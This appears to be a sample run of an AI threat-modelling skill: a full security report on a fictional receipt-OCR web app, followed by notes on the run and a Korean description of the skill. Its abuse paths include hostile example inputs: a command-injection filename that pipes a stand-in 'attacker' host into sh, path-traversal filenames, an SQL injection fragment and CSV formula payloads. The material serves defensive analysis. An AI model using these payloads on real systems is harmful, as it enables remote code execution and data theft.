I'm skipping the assumption check-in the skill normally calls for, because you said not to ask and gave the context up front. The remaining assumptions are listed below, and the conclusions that depend on them are marked. I also couldn't write skill-trial-icjul6yt-threat-model.md, because I have no file-write tool in this session. The full report is below, and you can save it as is.
Executive summary
Any logged-in employee can get code execution as root, and the code has three separate paths to it. They are an unsanitised upload filename (arbitrary file write), shell=True with that same filename in the worker, and SQL built by f-string from OCR text the attacker controls. With the container's SECRET_KEY and DB_URL, that becomes full access to all receipts and the database. Separately, /admin/export checks only for the @company.com suffix, which every employee has, so the admin check does nothing. /receipt/{name} has no ownership check, so any employee can read anyone's receipts. The VPC and SSO shrink the attacker pool to employees and compromised employee accounts. They don't change what that attacker can reach, and there are no per-user boundaries behind the login.
Scope and assumptions
- In scope:
app/main.py,app/worker.py,config.py, the Dockerfile and its build and dependency handling. The runtime and build paths are covered together because the Dockerfile is the only build artifact. - Out of scope (per you): the SSO provider and the cloud account.
- Assumptions:
- The framework is FastAPI/Starlette, inferred from
@app.post,DependsandFileResponse. job_queueis a Redis-backed queue (RQ or similar). The code doesn't show it.- The web app and the worker run from the same root image, with
SECRET_KEYandDB_URLin both environments. /data/uploadsis a shared persistent volume.- The reverse proxy enforces no body-size, filename or content-type rules.
current_useris derived from SSO headers or a session, and its internals weren't provided.- Users are mostly honest, but one phished or malicious account is a realistic starting point.
- The framework is FastAPI/Starlette, inferred from
- Open questions that would change the ranking:
- Are there roles beyond "employee", such as finance or admin, and who should be able to call
/admin/export? - Does the worker or Redis hold credentials with reach beyond this app, such as a broad DB user, cloud instance role or network access to other internal services?
- Can contractors or other non-
company.comidentities authenticate through SSO? This affects TM-005.
- Are there roles beyond "employee", such as finance or admin, and who should be able to call
System model
Primary components
- Reverse proxy: TLS and SSO enforcement (assumed).
- Web API:
app/main.pywith/upload,/receipt/{name}and/admin/export. - Job queue:
job_queue.enqueue(ocr_receipt, path, user.id). - OCR worker:
app/worker.py, which shells out totesseract. - File store:
/data/uploads(config.py: UPLOAD_DIR). - Database: an
expensestable reached throughDB_URL. - Container: runs as root, and
tesseractis installed from apt with unpinned versions.
Data flows and trust boundaries
- Employee browser → Reverse proxy → Web API
- Data crossing: SSO session, multipart file with an attacker-chosen filename, path parameters.
- Channel: HTTPS (assumed).
- Guarantees: SSO authentication only.
- Validation: none.
file.filename, file size and file type are not checked, andnameis not checked.
- Web API → File store
- Data crossing: raw receipt bytes written to
os.path.join(UPLOAD_DIR, file.filename). - Channel: local filesystem, as root.
- Guarantees: none. There is no path canonicalisation, ownership record or collision handling. An absolute filename makes
os.path.joindiscardUPLOAD_DIR.
- Data crossing: raw receipt bytes written to
- Web API → Job queue → Worker
- Data crossing: path string and
user_id. - Channel: Redis or similar (assumed).
- Guarantees: unknown. The queue is likely unauthenticated inside the VPC, and RQ-style queues pickle their payloads.
- Data crossing: path string and
- Worker → tesseract (subprocess)
- Data crossing: the path is interpolated into a shell string with
shell=True. The image content is parsed by tesseract and its libraries. - Guarantees: none. There is no argument list, no sandbox and no resource limits.
- Data crossing: the path is interpolated into a shell string with
- Worker → Database
- Data crossing: OCR text, which comes from attacker-supplied images, interpolated into SQL by f-string.
- Guarantees: none. There is no parameterisation, and
textis bytes, so the stored value isb'...'.
- Web API → Employee (
/receipt,/export)- Data crossing: receipt files, plus a CSV of every expense.
- Guarantees: authentication only. There is no per-user authorisation on
/receipt, and the check on/exportis trivially satisfied.
Diagram
flowchart LR
subgraph Untrusted
U["Employee browser"]
end
subgraph VPC
P["Reverse proxy SSO"]
W["Web API"]
Q["Job queue"]
K["OCR worker"]
T["Tesseract"]
F["Upload volume"]
D["Expenses DB"]
end
U --> P
P --> W
W --> F
W --> Q
W --> D
Q --> K
K --> T
T --> F
K --> D
Assets and security objectives
| Asset | Why it matters | Objective |
|---|---|---|
Receipt files in /data/uploads |
Personal data and bank card fragments | C, I |
expenses table |
Financial records and OCR text with PII | C, I |
SECRET_KEY, DB_URL (env) |
Session or signing compromise, direct DB access | C |
| Container and host runtime (root) | Foothold for lateral movement inside the VPC | C, I, A |
| Application code and image | Overwriting it gives persistent code execution | I |
| Queue contents | Tampering gives code execution in the worker | I |
| Service availability | Expense submission halts | A |
Attacker model
Capabilities
- Any authenticated employee, which covers roughly 400 people, a phished or compromised account, or a malicious insider.
- Full control over the filename, content and size of uploads.
- Free choice of
nameon/receipt/{name}. - Free choice of the text inside an uploaded image, which OCR passes through to SQL.
Non-capabilities
- No anonymous or internet access, since the service is behind the VPC and SSO.
- No compromise of the SSO provider or cloud account (out of scope).
- No direct network access to the DB or queue at the start. Reaching them requires first getting code execution in the app.
Entry points and attack surfaces
| Surface | How reached | Trust boundary | Notes | Evidence |
|---|---|---|---|---|
| Upload filename | POST /upload multipart |
Browser → API → FS | Path traversal, absolute path, overwrite of other users' files, shell metacharacters | app/main.py: upload, os.path.join(UPLOAD_DIR, file.filename) |
| Upload content | POST /upload |
API → Worker → tesseract | No size or type limit, parser attack surface, OCR text flows into SQL | app/main.py: upload, app/worker.py: ocr_receipt |
| Shell invocation | Queue job | Worker → OS | Command injection through the path | subprocess.run(f"tesseract {path} - ", shell=True ...) |
| SQL insert | Queue job | Worker → DB | Injection from OCR text | db.execute(f"INSERT ... '{text}'") |
| Receipt read | GET /receipt/{name} |
API → FS → Browser | No ownership check. Content type is guessed from the extension, so an uploaded .html or .svg is served from the app origin |
app/main.py: get_receipt, FileResponse |
| Admin export | GET /admin/export |
API → DB → Browser | endswith("@company.com") passes for everyone. Non-matching users get a null 200. CSV is built from attacker-influenced raw_text |
app/main.py: export |
| Queue | Redis or similar | Network → Worker | Unauthenticated access allows job forgery (assumed) | job_queue.enqueue |
| Build | Dockerfile | Supply chain | Root user, unpinned apt and pip, no image scanning | Dockerfile |
Top abuse paths
- Arbitrary file write to RCE as root:
- Upload with filename
../../app/main.py, or an absolute path like/app/app/main.py. - The app overwrites its own code, or a
.pthfile, cron entry or similar. - On the next restart or import, the attacker has root code execution.
- They read
SECRET_KEYandDB_URLand dump everything.
- Upload with filename
- Command injection in the worker:
- Upload a file named
x;curl attacker|sh;.png. ocr_receiptrunstesseract x;curl attacker|sh;.png -through the shell.- This gives root RCE in the worker, with DB and queue access.
- Upload a file named
- SQL injection via OCR text:
- Upload an image that renders the text
'); UPDATE expenses SET ... --, or a subquery that copies other rows into this record'sraw_text. - The worker interpolates it into SQL.
- The attacker tampers with financial records, or reads other users' rows through their own
/exportor record view.
- Upload an image that renders the text
- Mass PII read through the broken admin check:
- Any employee calls
/admin/export. - The
@company.comsuffix check passes. - They receive a CSV of every user's OCR text, including card fragments and personal data.
- Any employee calls
- Cross-user receipt read (IDOR):
- Enumerate or guess filenames. They are user-chosen, often
receipt.pdf,IMG_0001.jpg. - Call
GET /receipt/{name}and read other employees' receipts.
- Enumerate or guess filenames. They are user-chosen, often
- Stored XSS to admin actions:
- Upload
evil.htmlcontaining JavaScript. - Send the
/receipt/evil.htmllink to a target. - The script runs on the app origin with the victim's session, calls
/admin/export, and exfiltrates the result.
- Upload
- Receipt tampering:
- Upload a file with the same name as a victim's receipt.
- It silently overwrites the original, which is an integrity break for financial evidence with no audit trail.
- DoS and parser exploitation:
- Upload huge or malformed files.
- The disk fills, the worker stalls, or a vulnerable image library crashes or is exploited, because dependencies are unpinned, outdated or patchable only on rebuild.
- CSV formula injection:
- A receipt's OCR text starts with
=HYPERLINK(...)or=cmd|.... - Finance opens the export in Excel and the formula executes.
- A receipt's OCR text starts with
Threat model table
| ID | Source | Prerequisites | Threat action | Impact | Assets | Existing controls | Gaps | Recommended mitigations | Detection | Likelihood | Impact sev. | Priority |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| TM-001 | Authenticated employee | Valid SSO login | Path traversal or absolute path via file.filename writes arbitrary files as root |
Root RCE, code overwrite, receipt overwrite | Code, receipts, secrets | SSO only | No filename sanitising, no canonicalisation, runs as root | Ignore client filename. Store as <uuid><allowed-ext>, keep the original name in the DB. Verify realpath is under UPLOAD_DIR. Run as non-root with a read-only code filesystem |
Alert on writes outside UPLOAD_DIR; file integrity monitoring |
High | High | critical |
| TM-002 | Authenticated employee | Valid login | Shell metacharacters in the filename reach shell=True |
Root RCE in the worker | Worker, DB, queue, secrets | None | shell=True with an f-string |
Use subprocess.run(["tesseract", path, "-"], shell=False, timeout=...), with server-generated filenames |
Alert on unexpected child processes and egress from the worker | High | High | critical |
| TM-003 | Authenticated employee | Valid login | OCR text containing SQL is interpolated into INSERT |
Data tampering, cross-user data exposure, possible DB-level execution depending on DB | expenses, DB |
None | f-string SQL, bytes repr stored | Parameterised query, text.decode(errors="replace"). Use a least-privilege DB user (INSERT only) for the worker |
DB query logging, anomaly alerts on odd statements | High | High | critical |
| TM-004 | Authenticated employee | Valid login | Any user calls /admin/export |
Full PII and card-fragment exfiltration | expenses, privacy compliance |
endswith("@company.com") |
The check passes for everyone, no role, returns null instead of 403 | Real role check from the IdP group or claim, 403 on failure, audit-log every export, rate limit | Alert on /admin/export by non-finance identities |
High | High | critical |
| TM-005 | Authenticated employee or lookalike identity | Employee login, or a non-company identity if SSO allows | IDOR on /receipt/{name}, plus HTML/SVG upload served from the app origin |
Cross-user PII read, stored XSS to admin actions | Receipts, sessions | Authentication only | No ownership mapping, content type guessed from the extension | Store (receipt_id, owner_id), authorise on read, serve by opaque id. Allowlist types (jpg, png, pdf), force Content-Disposition: attachment and X-Content-Type-Options: nosniff, serve from a separate origin |
Log receipt reads with user and owner mismatch | High | Medium–High | high |
| TM-006 | Authenticated employee | Valid login | Oversized or malformed uploads, or a tesseract/library exploit | Disk exhaustion, worker stall, possible parser RCE | Availability, worker | None | No size limit, type check, timeout or quota | Size cap at the proxy and app, magic-byte validation, per-user quota, worker timeouts and memory limits, run tesseract in a sandbox (separate container, seccomp, no network) | Disk and queue depth alerts, worker crash metrics | Medium | Medium | medium |
| TM-007 | Network attacker inside the VPC, or post-compromise | Network reach to the queue (assumed) | Forge or modify queue jobs, for example with pickled payloads | Worker RCE | Worker, DB | Unknown (the VPC) | No evidence of queue authentication or TLS | Queue authentication and network policy, JSON-only job payloads, restrict the queue to web and worker | Alert on unexpected queue clients | Low–Medium | High | medium (conditional on queue config) |
| TM-008 | Developer, supply chain | Compromised or vulnerable package or apt state at build time | Unpinned packages pulled at build | Backdoored or vulnerable image, non-reproducible builds | Image, all runtime assets | None | No pins or hashes, root user | Pin versions and hashes (lockfile), pinned base image digest, image scanning in CI, non-root user | Image scan alerts, SBOM diffs | Low | High | medium |
| TM-009 | Authenticated employee | Valid login, and a finance user opening the CSV in a spreadsheet | Formula injection through raw_text in the CSV |
Code execution or data exfiltration on the finance user's workstation | Finance endpoints | None | No CSV escaping | Prefix cells beginning with = + - @ \t \r with '. Provide the export as XLSX or sanitised CSV |
n/a | Low–Medium | Medium | medium |
| TM-010 | Any actor | Any of the above | Cannot reconstruct who uploaded, read or exported what | Weak forensics and accountability for PII access | Audit log | None | No logging at all | Structured audit log of upload, read and export with user id, receipt id, source IP and outcome. Ship it off the box | n/a | High | Medium | medium |
Criticality calibration
- Critical means code execution, or reading or modifying all receipts and expenses, by any employee.
- Examples: TM-001 (traversal to RCE), TM-002 (command injection), TM-004 (open admin export).
- High means exposure of other users' PII or a path to privileged actions, but with narrower reach.
- Examples: cross-user receipt reads, stored XSS that rides an admin session, a DB role that allows reading cloud metadata.
- Medium means disruption, or an issue that needs a further precondition.
- Examples: disk-filling uploads, an unauthenticated queue (if the network allows it), unpinned dependency drift.
- Low means limited impact or an unlikely precondition.
- Examples: version disclosure in errors, missing security headers on non-sensitive responses, verbose 500 pages.
Focus paths for security review
| Path | Why it matters | Related threats |
|---|---|---|
app/main.py (upload) |
Unsanitised file.filename, no size or type limits, no ownership recorded |
TM-001, TM-006, TM-007 |
app/main.py (get_receipt) |
No ownership check, content type guessed from the extension | TM-005 |
app/main.py (export) |
Ineffective authorisation, CSV injection | TM-004, TM-009 |
app/worker.py (ocr_receipt) |
shell=True, SQL f-string, runs tesseract on untrusted files |
TM-002, TM-003, TM-006 |
config.py |
Secrets are in the environment, so a root RCE reads them immediately | TM-001, TM-002 |
Dockerfile |
Runs as root, unpinned dependencies, no hardening | TM-001, TM-008 |
Wherever current_user and job_queue are defined (not provided) |
Authentication semantics and queue transport and trust | TM-005, TM-007 |
Quality check
- Entry points: upload, receipt read, export, queue and build are all covered.
- Trust boundaries: each one in the diagram appears in at least one threat.
- Runtime vs build: TM-008 is the only build-time item. The rest is runtime.
- User clarifications: your context is reflected throughout. Open questions are listed in "Scope and assumptions", and none were answered.
- Assumptions: the framework, queue type, shared root image, proxy behaviour and
current_userinternals remain unverified.
If you want a fix order, I'd go TM-004, TM-002, TM-001, TM-003, then TM-005. All five are small code changes. The first four are about a line or a few lines each, and TM-005 needs an owner column on the receipts.
Real run in an isolated folder with only this skill installed. Only the Skill and Read tools were enabled, so no command was run and no file was written. The scenario is fictional. The code and context were pasted into the request, not read from a real repository. The model could not write the report file, so it printed the report instead.
하는 일
일반적인 체크리스트가 아니라 그 저장소에 맞춘 애플리케이션 보안(AppSec) 위협 모델을 만듭니다. 코드에서 구성 요소, 데이터 흐름, 신뢰 경계를 정리하고, 중요한 자산과 공격자가 현실적으로 할 수 있는 일과 할 수 없는 일을 나열한 뒤, 위협을 공격 경로로 열거하고 가능성, 영향, 우선순위를 매깁니다. 시스템에 대한 모든 주장은 저장소 안의 근거(경로, 심볼, 설정 키)에 연결되어야 하고, 확인할 수 없는 것은 가정으로 밝힙니다.
진행 방식
최종 보고서를 쓰기 전에 핵심 가정을 요약하고 한두세 개의 구체적인 질문(배포 방식, 노출 범위, 데이터 민감도, 역할)을 합니다. 보고서 구조는 고정입니다. 요약, Mermaid 다이어그램이 있는 시스템 모델, 자산, 공격자 모델, 진입점, 주요 공격 경로, 고정 ID의 위협 표, 심각도 기준, 사람이 집중해서 볼 만한 경로.
이런 때 좋습니다
출시 전 서비스 점검, 보안 검토 준비, 낯선 코드베이스에서 어디부터 볼지 정할 때. 명시적인 위협 모델링 요청용이며 일반 코드 리뷰가 아닙니다.
중간 위험:지정한 저장소를 AI가 검색하고, 마지막에 Markdown 보고서 파일(<저장소 이름>-threat-model.md) 하나를 쓰게 합니다. 코드와 설정을 읽으므로 저장소 안의 비밀 정보가 AI에 보일 수 있습니다. 스킬은 가리도록 요구하지만, 사용하는 AI 도구에 넘겨도 되는 코드에만 쓰세요. 코드를 실행하거나 운영 중인 시스템을 스캔하지 않습니다. 위협 모델은 코드와 사용자의 답변에 근거한 분석이며 감사나 침투 테스트가 아니고, 순위는 직접 확인해야 하는 가정에 좌우됩니다. OpenAI가 만든 원본(Apache-2.0), 수정 없음. 가상의 작은 앱으로 한 번 시험 실행했으며 코드는 붙여 넣었고 시험 중 모델은 파일을 쓸 수 없었습니다.